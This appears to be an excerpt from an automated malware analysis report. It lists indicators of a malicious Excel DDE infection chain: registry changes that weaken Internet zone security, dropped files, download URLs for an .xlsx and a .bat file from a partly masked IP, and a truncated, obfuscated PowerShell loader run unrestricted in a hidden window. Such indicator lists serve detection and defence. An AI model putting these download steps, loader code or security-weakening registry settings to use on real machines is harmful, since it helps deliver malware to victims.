Technical Information
- [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4] '1400' = '00000003'
- [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4] '1C00' = '00000000'
- %APPDATA%\gogi.xlsx
- %APPDATA%\~$gogi.xlsx
- '19#.#8.251.169':7287
- http://19#.##.251.169:7287/gogi.xlsx via 19#.#8.251.169
- http://19#.##.251.169:7287/gogis.bat via 19#.#8.251.169
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy UnRestricted function kECMOkR($gdxSDC, $rTnOMRhfVJUY){[IO.File]::WriteAllBytes($gdxSDC, $rTnOMRhfVJUY)};function mumNyknYLgnsVYB($gdxSDC){if($gdxSDC.EndsWith((LSLyBfLILlsvQ @(7...' (with hidden window)
- '%ProgramFiles%\microsoft office\office14\excel.exe' /dde